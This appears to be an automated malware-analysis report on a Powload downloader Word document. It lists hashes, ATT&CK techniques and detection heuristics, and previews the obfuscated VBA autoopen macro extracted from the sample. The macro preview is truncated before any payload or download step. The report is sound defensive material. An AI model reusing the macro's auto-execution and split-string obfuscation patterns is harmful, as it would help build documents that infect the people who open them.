Powload — Office (OLE) malware analysis

Static analysis result for SHA-256 5d161eab7ef2878e…

MALICIOUS

Office (OLE)

239.0 KB Created: 2019-04-23 13:04:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: 497519dcb67c2b6e8d518386e37c4b0a SHA-1: b67537419862600d034df32e1533a7531c2f220d SHA-256: 5d161eab7ef2878e01833a5eaa610cb8512d10bb3606bcfdc1dfa486598fa093
342 Risk Score

Malware Insights

Powload · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

This document contains a critical OLE_VBA_WMI_PROCESS_CREATE heuristic, indicating the use of VBA to launch a Win32_Process via WMI. The presence of OLE_VBA_SPLIT_KEYWORD_OBFUSCATION with the token 'Win32_Process' and the ClamAV detection 'Doc.Downloader.Powload-6953161-0' strongly suggest this is a Powload downloader variant. The autoopen macro is designed to execute this malicious functionality.

Heuristics 9

  • ClamAV: Doc.Downloader.Powload-6953161-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6953161-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 57494 bytes
SHA-256: a8972673a7d8e06b537a4679ce0e2dde46944fb6286ae06a45a3d77234a44f7b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dAU4DZ14"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HA4CAA"
Attribute VB_Base = "0{0FE26576-35BC-4E90-8102-B56BC7978D84}{691730C0-B418-4EE1-B948-EC7D921E916E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "aQBQ_AAA"
Attribute VB_Base = "0{1CCF411A-F19D-428E-B128-6E553A49C527}{8009BC2E-AD3C-4A51-9698-70D376D07231}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "tAAAQBD"
Sub autoopen()
   If aUcCAA = BAAAcBwQ Then
     zAGZDo = mADCA4 - QkUQ_AQA
       ElseIf b4GwAAQ = BBcxkAUA Then
      Select Case DUAXkZk
         Case 130717671
       fXwACDxA = 532690017 * J1QUAA / 94766113 * Hex(278321947 * Fix(O_BxAAUB / CStr(KGQABABD) * OQABAk - Fix(858227226)) - 485292790 * Round(BBACAA + Hex(u_4BBoB) / 493923429 - 510482471))
       wQxZoZQw = vAAQQA + rAkCkXAG * SUU4AAAU / Sqr(AABQDAc) / 405502097 - Hex(QcZUG4) + (748718389 / 24348995)
      End Select
End If
   If DxxoAGXk = o1kC_U Then
     MCAQZoZA = pUUAB1oQ - DZDoAAA
       ElseIf wBxXXQDc = GDQAUAD Then
      Select Case mBAUoDA
         Case 744981456
       CX_AZA = 233116574 * LUX14A / 393646717 * Hex(983144437 * Fix(wBDQAZB / CStr(IkAAAcAA) * OkABAB - Fix(817693743)) - 535025997 * Round(W_DAA4_ + Hex(cQACDAD) / 787469753 - 904432682))
       SCUox_ = KCDC1A + BxAXZBGk * IQCDQAk / Sqr(ZAXAUA) / 459475629 - Hex(XADZACAQ) + (269874574 / 225039103)
      End Select
End If
   If jGZDxD = IDUoCco Then
     IBw4AX1 = hZUAo4B4 - Jk41UcCA
       ElseIf z1DAAUx = VZXA1AZ Then
      Select Case ZDxD1DA
         Case 281164218
       ZAADoD = 733970469 * YAX4Qc / 286668584 * Hex(298925152 * Fix(QBwAUAA / CStr(B1Z_kQB) * GAQQUD - Fix(227236327)) - 620446010 * Round(MDcQQAA + Hex(SAAB_D) / 301284213 - 832542895))
       DAXxXAG = HoAQxBD1 + mGoAAAA * D_kQAXwG / Sqr(p4ko_BU) / 313076272 - Hex(lkAAAw) + (780191755 / 190643459)
      End Select
End If
sC4AkD
   If DUABokc_ = oBQAxA Then
     WCAA1Uc = TBAUk_ - MBBAxCAw
       ElseIf CwC1DD4U = XUwBko4A Then
      Select Case jkBCQAAA
         Case 426317759
       VZCAQAAZ = 688430743 * RADBDUAA / 323625214 * Hex(168529708 * Fix(ECAcQx_1 / CStr(wxAAC4) * UBDcQA4 - Fix(941519462)) - 693287796 * Round(OGUAQBC + Hex(bZw_Uww) / 327664038 - 917306731))
       P4QQBoDX = iAAoUAA + VcAXxA4 * bwAx4U / Sqr(vAoGAQAC) / 945263989 - Hex(fxAcxQGQ) + (560280688 / 401479997)
      End Select
End If
   If G4ABAQoD = IADAQ1 Then
     WAGABk = fAAAADk - CkAXoA1G
       ElseIf NADAB1_A = sAAAZA Then
      Select Case uAD4CAA
         Case 148254135
       dZU4GAcZ = 224997473 * j4AUAD / 13350506 * Hex(989180132 * Fix(kGBQU4Gc / CStr(Vo4ZwA) * lAcCUD1 - Fix(566146267)) - 45299687 * Round(MAAUABA + Hex(wAAQXQGA) / 3943870 - 555426987))
       rGAGAQ1_ = d__AAA + jUDUDAc * fUQBZxAU / Sqr(lADQADBA) / 882451017 - Hex(XUABAQG) + (445516118 / 294789188)
      End Select
End If
   If jAAAkAAD = bAGcAA Then
     cBGA_UQ = ucQQAAG - N4oAAAwA
       ElseIf fXwAAA = ECBZZA Then
      Select Case FAUwox
         Case 372298751
       iUACDZA = 654500460 * NGUAAQQ / 575488400 * Hex(693046026 * Fix(FABDwAAQ / CStr(rDQ_AcA) * jBcAA4U - Fix(566813156)) - 238361471 * Round(WGAA_c + Hex(H4AkAAA) / 287124950 - 953699704))
       d_BADA = jAADGBDA + BcCAA4B * hCZAAAck / Sqr(V_BDc4B) / 317075576 - Hex(OAA1AAA) + (295290448 / 833258115)
      End Select
End If
End Sub

Attribute VB_Name = "AGQCBD"
Function sC4AkD()
On Error Resume Next
   If rAAZcAA = hD_cAQD Then
     VBxA_1_ = lGG1GZGw - tAoAZAAQ
      
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.